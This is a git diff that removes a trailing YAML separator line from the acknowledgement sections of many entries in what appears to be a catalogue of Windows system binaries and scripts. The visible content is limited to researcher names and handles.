index 5b8f856..33cee24 100644
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml
index 08a9e44..0056fdb 100644
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@@ -57,4 +57,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml
index 23a6d3f..aed6a0a 100644
--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
 - Person: elceef
 Handle: '@elceef'
----
diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml
index 9f6d1bc..aa45372 100644
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@@ -39,4 +39,3 @@ Acknowledgement:
 Handle: '@splinter_code'
 - Person: ap
 Handle: '@decoder_it'
----
diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml
index bd8acc1..712c8c4 100644
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@@ -91,4 +91,3 @@ Acknowledgement:
 Handle: '@404death'
 - Person: Martin Ingesen
 Handle: '@Mrtn9'
----
diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml
index 0190d5c..e4f94aa 100644
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
 - Person: Pierre-Alexandre Braeken
 Handle: '@pabraeken'
----
diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml
index 9409e42..9dff5c1 100644
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
 - Person: Matt Graeber
 Handle: '@mattifestation'
----
diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml
index 3f6fcf3..337c4eb 100644
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml
index 4f3e5b5..7ad9afd 100644
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
 - Person:
 Handle:
----
diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml
index 41def89..bf2a128 100644
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
 - Person: Nick Tyrer
 Handle: '@nicktyrer'
----
diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml
index e171778..480fdcb 100644
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@@ -31,4 +31,3 @@ Acknowledgement:
 Handle: '@hexacorn'
 - Person: Elliot Killick
 Handle: '@elliotkillick'
----
diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml
index 8d2b315..62a1bcf 100644
--- a/yml/OSBinaries/Stordiag.yml
+++ b/yml/OSBinaries/Stordiag.yml
@@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
 - Person: Eral4m
 Handle: '@eral4m'
----
diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml
index ffca55a..2f145ff 100644
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Nick Landers
 Handle: '@monoxgas'
----
diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml
index 84f92ca..ff72cf1 100644
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@@ -35,4 +35,3 @@ Acknowledgement:
 Handle: '@oddvarmoe'
 - Person: Maxime Nadeau
 Handle: '@m_nad0'
----
diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml
index 2e8ee54..8c58cc1 100644
--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@@ -37,4 +37,3 @@ Acknowledgement:
 Handle: '@oulusoyum'
 - Person: Matt Graeber
 Handle: '@mattifestation'
----
diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml
index 47d177f..6f41d61 100644
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@@ -31,4 +31,3 @@ Acknowledgement:
 Handle:
 - Person: Hai Vaknin(Lux)
 Handle:
----
diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml
index bf5280a..5b4f04c 100644
--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Nick Tyrer
 Handle: '@NickTyrer'
----
diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml
index a3652cf..5a15a2a 100644
--- a/yml/OSBinaries/Wab.yml
+++ b/yml/OSBinaries/Wab.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Adam
 Handle: '@Hexacorn'
----
diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml
index 303a5fc..42365ae 100644
--- a/yml/OSBinaries/Wlrmdr.yml
+++ b/yml/OSBinaries/Wlrmdr.yml
@@ -30,4 +30,3 @@ Acknowledgement:
 Handle: '@Oddvarmoe'
 - Person: Freddy
 Handle: '@falsneg'
----
diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml
index f4271e9..b8737d2 100644
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@@ -88,4 +88,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml
index 6d271a1..667c145 100644
--- a/yml/OSBinaries/WorkFolders.yml
+++ b/yml/OSBinaries/WorkFolders.yml
@@ -24,4 +24,3 @@ Acknowledgement:
 Handle: '@YoSignals'
 - Person: Elliot Killick
 Handle: '@elliotkillick'
----
diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml
index e24f33f..c7d8eb1 100644
--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@@ -42,4 +42,3 @@ Acknowledgement:
 Handle: '@oddvarmoe'
 - Person: SaiLay(valen)
 Handle: '@404death'
----
diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml
index fcab2d3..f854c1c 100644
--- a/yml/OSBinaries/Wsreset.yml
+++ b/yml/OSBinaries/Wsreset.yml
@@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
 - Person: Hashim Jawad
 Handle: '@ihack4falafel'
----
diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml
index c5608aa..d788e8d 100644
--- a/yml/OSBinaries/Wuauclt.yml
+++ b/yml/OSBinaries/Wuauclt.yml
@@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
 - Person: David Middlehurst
 Handle: '@dtmsecurity'
----
diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml
index 8c01a73..61565c1 100644
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@@ -50,4 +50,3 @@ Acknowledgement:
 Handle: '@harr0ey'
 - Person: Wade Hickey
 Handle: '@notwhickey'
----
diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml
index 5e75f3c..eaae18d 100644
--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@@ -62,4 +62,3 @@ Acknowledgement:
 Handle: '@moriarty_meng'
 - Person: Nick Carr (Threat Intel)
 Handle: '@ItsReallyNick'
----
diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml
index 532c0e7..b958500 100644
--- a/yml/OSLibraries/Desk.yml
+++ b/yml/OSLibraries/Desk.yml
@@ -41,4 +41,3 @@ Acknowledgement:
 Handle: '@SecurePeacock'
 - Person: Jose Luis Sanchez
 Handle: '@Joseliyo_Jstnk'
----
diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml
index 7deb471..b48fc42 100644
--- a/yml/OSLibraries/Dfshim.yml
+++ b/yml/OSLibraries/Dfshim.yml
@@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml
index 5d4b41d..2a08d33 100644
--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@@ -57,4 +57,3 @@ Acknowledgement:
 Handle: '@0rbz_'
 - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD)
 Handle: '@pabraeken'
----
diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml
index 7d8bc1b..348928d 100644
--- a/yml/OSLibraries/Ieframe.yml
+++ b/yml/OSLibraries/Ieframe.yml
@@ -28,4 +28,3 @@ Acknowledgement:
 Handle: '@bohops'
 - Person: Adam
 Handle: '@hexacorn'
----
diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml
index 9483c3c..73f3388 100644
--- a/yml/OSLibraries/Mshtml.yml
+++ b/yml/OSLibraries/Mshtml.yml
@@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
 - Person: Pierre-Alexandre Braeken
 Handle: '@pabraeken'
----
diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml
index 1f47e38..0a3def5 100644
--- a/yml/OSLibraries/Pcwutl.yml
+++ b/yml/OSLibraries/Pcwutl.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Matt harr0ey
 Handle: '@harr0ey'
----
diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml
index 4295dd3..adf27be 100644
--- a/yml/OSLibraries/Setupapi.yml
+++ b/yml/OSLibraries/Setupapi.yml
@@ -43,4 +43,3 @@ Acknowledgement:
 Handle: '@subTee'
 - Person: Nick Carr (Threat Intel)
 Handle: '@ItsReallyNick'
----
diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml
index 8a8dccd..c3f5bd8 100644
--- a/yml/OSLibraries/Shdocvw.yml
+++ b/yml/OSLibraries/Shdocvw.yml
@@ -28,4 +28,3 @@ Acknowledgement:
 Handle: '@hexacorn'
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml
index 4ddf18e..ea8e116 100644
--- a/yml/OSLibraries/Shell32.yml
+++ b/yml/OSLibraries/Shell32.yml
@@ -46,4 +46,3 @@ Acknowledgement:
 Handle: '@mattifestation'
 - Person: Kyle Hanslovan (ShellExec_RunDLL)
 Handle: '@KyleHanslovan'
----
diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml
index 44a0bb4..ad673b2 100644
--- a/yml/OSLibraries/Syssetup.yml
+++ b/yml/OSLibraries/Syssetup.yml
@@ -40,4 +40,3 @@ Acknowledgement:
 Handle: '@harr0ey'
 - Person: Jimmy (Scriptlet)
 Handle: '@bohops'
----
diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml
index ea34df9..0de5892 100644
--- a/yml/OSLibraries/Url.yml
+++ b/yml/OSLibraries/Url.yml
@@ -69,4 +69,3 @@ Acknowledgement:
 Handle: '@DissectMalware'
 - Person: r0lan (Obfuscation)
 Handle: '@r0lan'
----
diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml
index d64c755..129fad6 100644
--- a/yml/OSLibraries/Zipfldr.yml
+++ b/yml/OSLibraries/Zipfldr.yml
@@ -34,4 +34,3 @@ Acknowledgement:
 Handle: '@moriarty_meng'
 - Person: r0lan (Obfuscation)
 Handle: '@r0lan'
----
diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml
index 03596cf..500214b 100644
--- a/yml/OSLibraries/comsvcs.yml
+++ b/yml/OSLibraries/comsvcs.yml
@@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
 - Person: modexp
 Handle:
----
diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml
index 638cea1..a227eaf 100644
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml
index 08d6674..22ee4fa 100644
--- a/yml/OSScripts/CL_mutexverifiers.yml
+++ b/yml/OSScripts/CL_mutexverifiers.yml
@@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
 - Person: Pierre-Alexandre Braeken
 Handle: '@pabraeken'
----
diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml
index 6610eb1..8197863 100644
--- a/yml/OSScripts/Cl_invocation.yml
+++ b/yml/OSScripts/Cl_invocation.yml
@@ -28,4 +28,3 @@ Acknowledgement:
 Handle: '@bohops'
 - Person: Pierre-Alexandre Braeken
 Handle: '@pabraeken'
----
diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml
index edf125c..bab7431 100644
--- a/yml/OSScripts/Manage-bde.yml
+++ b/yml/OSScripts/Manage-bde.yml
@@ -36,4 +36,3 @@ Acknowledgement:
 Handle: '@danielbohannon'
 - Person: John Lambert
 Handle: '@JohnLaTwC'
----
diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml
index b95813a..b86d241 100644
--- a/yml/OSScripts/Pubprn.yml
+++ b/yml/OSScripts/Pubprn.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Matt Nelson
 Handle: '@enigma0x3'
----
diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml
index fb6aa06..f9e3dd4 100644
--- a/yml/OSScripts/Syncappvpublishingserver.yml
+++ b/yml/OSScripts/Syncappvpublishingserver.yml
@@ -25,4 +25,3 @@ Acknowledgement:
 Handle: '@monoxgas'
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml
index b4908a6..ee53be2 100644
--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
 - Person: Nick VanGilder
 Handle: '@nickvangilder'
----
diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml
index 67a1719..cdd4176 100644
--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@@ -55,4 +55,3 @@ Acknowledgement:
 Handle: '@bohops'
 - Person: Red Canary Company cc Tony Lambert
 Handle: '@redcanaryco'
----
diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml
index bc19377..c7d8827 100644
--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
@@ -34,4 +34,3 @@ Acknowledgement:
 Handle: '@p0w3rsh3ll'
 - Person: Stamatis Chatzimangou
 Handle: '@_st0pp3r_'
----
diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml
index 6c21705..8c07903 100644
--- a/yml/OtherMSBinaries/AccCheckConsole.yml
+++ b/yml/OtherMSBinaries/AccCheckConsole.yml
@@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml
index da7749d..0cd6d62 100644
--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
 - Person: mr.d0x
 Handle: '@mrd0x'
----
diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml
index e082f2c..1af9f88 100644
--- a/yml/OtherMSBinaries/Agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@@ -28,4 +28,3 @@ Resources:
 Acknowledgement:
 - Person: Eleftherios Panos
 Handle: '@lefterispan'
----
diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml
index d8fdf6b..ad91b5f 100644
--- a/yml/OtherMSBinaries/Appvlp.yml
+++ b/yml/OtherMSBinaries/Appvlp.yml
@@ -44,4 +44,3 @@ Acknowledgement:
 Handle: '@moo_hax'
 - Person: Matt Wilson
 Handle: '@enigma0x3'
----
diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml
index 78d64cf..0d94ccf 100644
--- a/yml/OtherMSBinaries/Bginfo.yml
+++ b/yml/OtherMSBinaries/Bginfo.yml
@@ -60,4 +60,3 @@ Resources:
 Acknowledgement:
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
----
diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml
index 8e82023..db3adea 100644
--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@@ -42,4 +42,3 @@ Acknowledgement:
 Handle: '@mrd0x'
 - Person: Spooky Sec
 Handle: '@sec_spooky'
----
diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml
index 7026e44..d92d2dc 100644
--- a/yml/OtherMSBinaries/Coregen.yml
+++ b/yml/OtherMSBinaries/Coregen.yml
@@ -46,4 +46,3 @@ Acknowledgement:
 Handle:
 - Person: Casey Erikson
 Handle:
----
diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml
index 7634065..abd9565 100644
--- a/yml/OtherMSBinaries/Csi.yml
+++ b/yml/OtherMSBinaries/Csi.yml
@@ -28,4 +28,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml
index a1c22cc..dc4eab5 100644
--- a/yml/OtherMSBinaries/DefaultPack.yml
+++ b/yml/OtherMSBinaries/DefaultPack.yml
@@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
 - Person: checkymander
 Handle: '@checkymander'
----
diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml
index dede1aa..00b82ac 100644
--- a/yml/OtherMSBinaries/Devtoolslauncher.yml
+++ b/yml/OtherMSBinaries/Devtoolslauncher.yml
@@ -30,4 +30,3 @@ Resources:
 Acknowledgement:
 - Person: felamos
 Handle: '@_felamos'
----
diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml
index ba2d22a..7957ca2 100644
--- a/yml/OtherMSBinaries/Dnx.yml
+++ b/yml/OtherMSBinaries/Dnx.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Matt Nelson
 Handle: '@enigma0x3'
----
diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml
index 2490174..107fd5e 100644
--- a/yml/OtherMSBinaries/Dotnet.yml
+++ b/yml/OtherMSBinaries/Dotnet.yml
@@ -38,4 +38,3 @@ Acknowledgement:
 Handle: '@_felamos'
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OtherMSBinaries/Dump64.yml b/yml/OtherMSBinaries/Dump64.yml
index 4adb7c9..e4d1c6d 100644
--- a/yml/OtherMSBinaries/Dump64.yml
+++ b/yml/OtherMSBinaries/Dump64.yml
@@ -21,4 +21,3 @@ Resources:
 Acknowledgement:
 - Person: mr.d0x
 Handle: '@mrd0x'
----
diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml
index 6cc8b9d..cf5b56f 100644
--- a/yml/OtherMSBinaries/Dxcap.yml
+++ b/yml/OtherMSBinaries/Dxcap.yml
@@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
 - Person: Matt harr0ey
 Handle: '@harr0ey'
----
diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml
index a12816b..0dc1354 100644
--- a/yml/OtherMSBinaries/Excel.yml
+++ b/yml/OtherMSBinaries/Excel.yml
@@ -38,4 +38,3 @@ Resources:
 Acknowledgement:
 - Person: 'Reegun J (OCBC Bank)'
 Handle: '@reegun21'
----
diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml
index 2adf80a..f427c5a 100644
--- a/yml/OtherMSBinaries/Fsi.yml
+++ b/yml/OtherMSBinaries/Fsi.yml
@@ -36,4 +36,3 @@ Acknowledgement:
 Handle: '@NickTyrer'
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml
index 54e1cf5..35cc6c3 100644
--- a/yml/OtherMSBinaries/FsiAnyCpu.yml
+++ b/yml/OtherMSBinaries/FsiAnyCpu.yml
@@ -32,4 +32,3 @@ Acknowledgement:
 Handle: '@NickTyrer'
 - Person: Jimmy
 Handle: '@bohops'
----
diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml
index 6a98a92..93c0440 100644
--- a/yml/OtherMSBinaries/Mftrace.yml
+++ b/yml/OtherMSBinaries/Mftrace.yml
@@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
 - Person: fabrizio
 Handle: '@0rbz_'
----
diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml
index 234878a..3d285b3 100644
--- a/yml/OtherMSBinaries/Msdeploy.yml
+++ b/yml/OtherMSBinaries/Msdeploy.yml
@@ -30,4 +30,3 @@ Resources:
 Acknowledgement:
 - Person: Pierre-Alexandre Braeken
 Handle: '@pabraeken'
----
diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml
index 1fae912..77a3a18 100644
--- a/yml/OtherMSBinaries/Msxsl.yml
+++ b/yml/OtherMSBinaries/Msxsl.yml
@@ -47,4 +47,3 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml
index dc6bfe4..d9db99f 100644
--- a/yml/OtherMSBinaries/Ntdsutil.yml
+++ b/yml/OtherMSBinaries/Ntdsutil.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Sean Metcalf
 Handle: '@PyroTek3'
----
diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml
index 2e72a56..28baf81 100644
--- a/yml/OtherMSBinaries/Powerpnt.yml
+++ b/yml/OtherMSBinaries/Powerpnt.yml
@@ -35,4 +35,3 @@ Resources:
 Acknowledgement:
 - Person: Reegun J (OCBC Bank)
 Handle: '@reegun21'
----
diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml
index 65cbb04..546371f 100644
--- a/yml/OtherMSBinaries/Procdump.yml
+++ b/yml/OtherMSBinaries/Procdump.yml
@@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
 - Name: Alfie Champion
 Handle: '@ajpc500'
----
diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml
index 37af40f..e15b4c9 100644
--- a/yml/OtherMSBinaries/Rcsi.yml
+++ b/yml/OtherMSBinaries/Rcsi.yml
@@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
 - Person: Matt Nelson
 Handle: '@enigma0x3'
----
diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml
index 73931d7..2879a6e 100644
--- a/yml/OtherMSBinaries/Remote.yml
+++ b/yml/OtherMSBinaries/Remote.yml
@@ -37,4 +37,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index f851b49..accc4b1 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' ---- diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 235cbf4..64f3c43 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -33,4 +33,3 @@ Acknowledgement: Handle: '@bryon_' - Person: Manny Handle: '@ManuelBerrueta' ---- diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 492d0d4..58c2f90 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index a663d7c..0520437 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -55,4 +55,3 @@ Acknowledgement: Handle: '@reegun21' - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 6059749..ee6f3ce 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' ---- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index 6657aeb..e1de666 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subTee' ---- diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 7143975..84822c3 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml 
@@ -119,4 +119,3 @@ Acknowledgement: - Person: Adam Handle: '@Hexacorn' - Person: Jesus Galvez ---- diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 3b5d330..95eb07f 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: timwhite Handle: ---- diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index a32369a..4afb3a5 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@tifkin' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index a1eb7c8..29cbb5e 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 13e6a11..2d084c7 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -25,4 +25,3 @@ Acknowledgement: Handle: '@mattifestation' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index 2453029..11bc887 100644 --- a/yml/OtherMSBinaries/Winword.yml 